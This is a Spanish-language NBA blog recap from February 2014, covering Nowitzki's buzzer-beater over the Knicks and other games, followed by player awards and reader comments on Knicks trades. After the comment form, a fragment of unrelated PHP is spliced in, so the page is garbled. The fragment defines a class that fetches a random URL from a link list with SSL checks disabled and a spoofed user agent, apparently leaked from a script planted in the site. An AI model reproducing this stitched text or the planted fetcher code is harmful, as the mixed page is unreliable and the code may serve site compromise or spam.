La Crónica: Churro sobre la bocina

25 de February de 2014 por Simon

Jornada corta en la que a priori apenas aparecían partidos intersantes de cara a la clasificación.

El más destacado era quizás la visita de los Mavericks al Madison Square Garden. En un partido de idas y venidas en el que Dallas siempre matuvo una pequeña ventaja, los Knicks se las apañaron para reducir en el último minuto y medio una ventaja de 8 puntos y empatar el partido. Sin embargo, a perro flaco todo son pulgas y por desgracia para los Knicks esta vez fue la mala suerte la que se cebó con ellos. En la última posesión y tras una buena defensa de Carmelo Anthony, Dirk lanzó a canasta sobre la bocina muy forzado y tras varios rebotes en el tablero y el aro el balón terminó entrando, lo que significaba la tercera victoria seguida a domicilio a los Mavs y unos centímetros más de tierra sobre los Knicks (110-108). El propio Dirk comentó después en una entrevista que no había celebrado la canasta ya que había sido “tan fea…”.  El pobre Carmelo anotó 44 puntos y encima le metieron la canasta definitiva en toda la cara. Seguramente tras el partido de ayer esté un poquito más lejos de New York. 

Por su parte, los Clippers supieron sobreponerse al cansancio de haber jugado la noche anterior un duro partido contra Oklahoma y dieron buena cuenta de los New Orleans Pelicans. Una vez más la asociación entre Chris Paul y Blake Griffin fue la que lideró la victoria pero ayer hay que hacer una mención especial al banquillo que desatascó el partido cuando los Pelicans parecían venirse arriba y a Jamal Crawford que está jugando una de las mejores temporadas que se le recuerdan (123-110). Golden State Warriors era el otro equipo de post-temporada que jugaba anoche y también venció. Los Warriors no se emplearon a fondo y dejaron simplemente que el partido cayera por su propio peso. Y es que si llegas igualado al último cuarto con Detroit Pistons puedes estar seguro de que estos te regalarán el partido, más aún si son ellos los que juegan en casa.  Ayer ocurrió lo mismo una vez más y eso que los Warriors tampoco es que vivieran una de su mejores noche (104-96).

Si hay un partido en la NBA que no creo que apetezca a nadie ver ese seguro que es el Milwaukee Bucks – Philadelphia Sixers, con total seguridad los dos peores equipos de la liga. No sé si lo hacen adrede para compensar el escaso interés que genera el partido o no pero el caso es que los encuentros entre estos dos equipos esta temporada han estado realmente entretenidos con puntuaciones muy altas y jugadas muy vistosas. Ayer el partido quedó solucionado en el segundo cuarto cuando los Bucks endosaron 43 puntos a unos pírricos Sixers que poco a poco han ido evolucionando esta temporada al infame equipo que todos esperábamos al comienzo de la liga (130-110).

Para acabar la jornada teníamos otro duelo intrascendente a todas luces entre Boston Celtics y Utah Jazz.  El gran aliciente del partido era asistir a la vuelta a la acción de Derrick Favors después de perderse varios partidos por problemas en su cadera. El ex de Georgia Tech fue el  factor diferencial del partido con su gran efectividad de cara al aro. Los Jazz consiguieron una ventaja en el primer cuarto que prácticamente permanecería inalterable durante todo el encuentro (98-110).

PREMIOS

MVP: Chris Paul no encontró oposición para practicar su juego con comodidad. Como quien no quiere la cosa acabó con 19 puntos, 4 rebotes, 13 asistencias y 2 robos.

Rookie: Muy buen partido de Kelly Olynyk. El de los Celtics aprovechó los minutos de los que dispuso para anotar 21 puntos, coger 8 rebotes y repartir 4 asistencias. Giannis Antetokounmpo acabó con 13 puntos, 6 rebotes, 4 asistencias y 4 tapones.

Sorpresa: El francés Alexis Ajinca anotó 19 puntos y capturó 12 rebotes ante los Clippers. Jose Calderon anotó 20 puntos con un 5 de 8 en triples aunque mejor estuvo un prácticamente desaparecido hasta el día de hoy OJ Mayo que se fue para casa con 7 triples de 9 intentos.

Decepción: Me da la sensación de que tras la lesión el que volvió fue el hermano gemelo de Andre Iguodala porque su rendimiento actual es infinitamente peor que el principio de temporada. Ayer, 4 puntos con un 2 de 10 en tiros, un par de rebotes y un par de asistencias.

Esfuerzo en vano: Un día más el esfuerzo de Carmelo Anthony se queda en nada pero esta vez el destino ha querido ser realmente cruel. 44 puntos, 9 rebotes, 4 asistencias y una gran defensa sobre Nowitzki en la última posesión que se van por el retrete por el afortunadísimo buzzer beater del alemán.

TOP-10:

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Vader dice:
    #1

    Para redondear la temporada Felton detenido por posesiones de armas… Ojo que New York no es Texas y estas cosas son serias.

    Lo dicho, este año montanos un circo y nos crecen los enanos.

    Saludos

      Citar

  2. Ruxixon dice:
    #2

    Eso venía a decir yo Vader.Parecía insuperable esa época negra de I.Thomas como GM,con esa plantilla de varios millones por encima del límite y con jugadores protagonistas fuera de las canchas,pero lo de esta temporada va en la misma línea.Ya se hablan de amenazas a Dolan,ahora lo de Felton…es la Ley de Murphy en un equipo de la NBA y mientras otros equipos frotándose las manos por vuestras desgracias.

    El Warriors @ Pistons un tostón de primera categoría,ni los Warriors pusieron de su parte para que el encuentro mereciera la pena.Lo mejor de todo ver a Tom Izzo como protagonista de la emisión de la TV.Izzo es el entrenador universitario de los Spartans,ídolo local se podría decir,que suena con fuerza para dirigir a Detroit la temporada que viene.

      Citar

  3. Vader dice:
    #3

    @Ruxixon

    Yo no creo que esto supere la época de I.Thomas como GM. Por lo menos ahora mismo hay se ve un proyecto con continuidad, que ha salido mal, pero proyecto al fin y al cabo. Y además si finalmente Melo se fuera este verano, en 2015 al cabo de un año, tendríamos el roster limpio de salarios casi en su totalidad. Y en 2016 del todo.

    La noche del draft no podremos jugar con rondas, pero si con unos cuantos contratos expiring en 2015 (Stat, Bargiani y Chandler). Suponiendo que te quieres quedar con Chandler de pivot y que a Shumpert lo uses para conseguir facilitar algún traspaso o conseguir alguna ronda tendríamos esto:

    Quinteto incial: ??? – Hardaway JR. – Melo – ??? – Chandler
    Quintento suplente: Felton – JR Smith – ??? – Tyler – ???

    Hay que buscar un base titular y un 4 o un 3 (si quieres jugar con Melo de 4) titular mediante traspasos. Y luego para el banquillo algún alero y sobretodo reforzar el juego interior.

    Posibles candidatos a llegar en traspaso este verano, mirando rosters, evaluando situaciones de sus equipos de origen y hechandole imaginación (por que negarlo, pero cosas más raras habremos visto en la NBA):

    Josh Smith (Ya han intentado traspasarle sin éxito, quizá por un expiring más “algo”…)
    Andre Iguodala (¿Han mejorado con él los Warriors? No. NY podría dar un expiring + ….)
    Pau Gasol (¿Sign and trade a cambio de un expiring + Shumpert o ronda?)
    Lowry (¿Sign and trade a cambio de un expiring + Shumpert o ronda?)
    Jeff Teague (Parece que Atlanta no lo quiere por los 8Mill al año que tiene firmados)
    K.Faried (Un traspaso que ha sonado muchas veces, si nos llevásemos el contratazo de McGee a lo mejor sólo tendríamos que dar un expiring a cambio…)
    Derrick Favors (Queda libre este verano, ¿Sign and trade?)
    Darren Collison/Matt Barnes (el traspaso que sonó estos días por Shumpert/Felont y que al final no se hizo…)

    Y seguro que hay mil posibilidades más ahí fuera que se podrían aprovechar. Y si al final resulta que no puede ser lo lógico seria traspasar lo que se pudiera para conseguir rondas extras y mantener la flexibilidad sobretodo para el 2016.

    Saludos

      Citar

  4. Simon dice:
    #4

    Vader tío sin acritud… pero me dais una pena los aficionados a los Knicks con vuestras cuentas de la lechera para rearmar el equipo…
    De acuerdo en que si se va Melo la situación en NY sería dramática pero económicamente pronto se podría reconstruir ya que hay varios expirings muy jugosos. Pero te dejas en el tintero algunas cosas claves. El año que viene practicamente ningún equipo va a querer reconstruir. Osea todo el mundo va a tratar de crecer a partir de lo que se pesque este verano por lo tanto no va a haber tantos equipos queriendo liberar salarios así como así sin recibir nada a cambio.
    – Smith e Iguodala no creo que sus equipos se conformen con el trade que comentas ¿Expiring + algo…que algo? Lo único valioso que se me ocurre es Hardaway + una primera ronda de cuando? 2017???
    – Si los Raptors liberan este verano el contrato de Lowry… si no tuvieran intención de renovarlo que es lo que te hace pensar que estarían dispuestos a asumir un contrato ( alto ) expiring q no les iba a servir de nada para el futuro a no ser que metieras a Hardaway + la ronda de ¿volvemos a la de 2017?… Ujiri ya ha dicho que Shumpert na de na. La contraprestación de lo que tienes que dar por lo que recibes (para que te acepten es +/- igual )
    – A Gasol le podemos aplicar lo mismo que a Lowry. La ronda de ¿en serio sólo está la de 2017 disponible? y Shumpert ( más bien Lakers pediría a Hardaway ) pero para que querrían los Lakers asumir un contrato alto ( aunque sea expiring ) si ese salario ya lo tienen liberado un año antes. La contraprestación tendría que ser muyh alta para que aceptaran. Cómo digo: Mínimo habría que dar a Chandler + Hardaway/Shumpert + 1Ronda.

    – Favors ya ha firmado su contrato de larga duración con Utah así que mejor lo descartamos.

    Los otros dos trade sque comentas serían algo más lógicos de Faried y Teague pero en serio compensa traer a dos jugadores sobrepagados ( Faried este verano pasará a estarlo ) que no te van a hacer el equipo ganador… ( recordemos que tendrías que volver a dar salida a Shumper o Hardaway o alguna ronda (2017).

    Quizás he sido demasiado cortante o duro pero es que todos los años la misma cantinela de los Knicks, supongo que todo el mundo se hace sus pajas mentales con sus equipos pero o los de los Knicks sois muchos y por eso parecen más grandes o simplemente las pajas más grandes se las hacen los aficionados de NYK

      Citar

  5. Jose Luis dice:
    #5

    Nowiztki: “Es mi canasta ganadora más fea”

    Que va pisha, poca memoria tienes teutón xD

      Citar

  6. Vader dice:
    #6

    @Simon

    Tranquilo, si estoy totalmente de acuerdo contigo. Si de mi dependiera Melo ya estaria traspasado y se hubiera iniciado la recontrucción.

    Por otra parte creo que en mi anterior post no me he explicado bien. Sólo queria decir que no descartemos que uno de esos traspasos ocurriera (o alguno que ahora mismo no imaginamos), que luego Melo renueve y el equipo vaya “tirando” metiendose unos años en playoff esperando dar otro salto de calidad (como les pasaba a los Hawks de Joe Johnson).

    Pero vamos que no eran “pajas” mentales en plan optimista, más bien lo contrario…

    Saludos

    *la próxima primera ronda que podemos traspasar es la de 2018. La de 2017 no podemos porque ya traspasamos la de 2016 y no se pueden mover dos años seguidos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>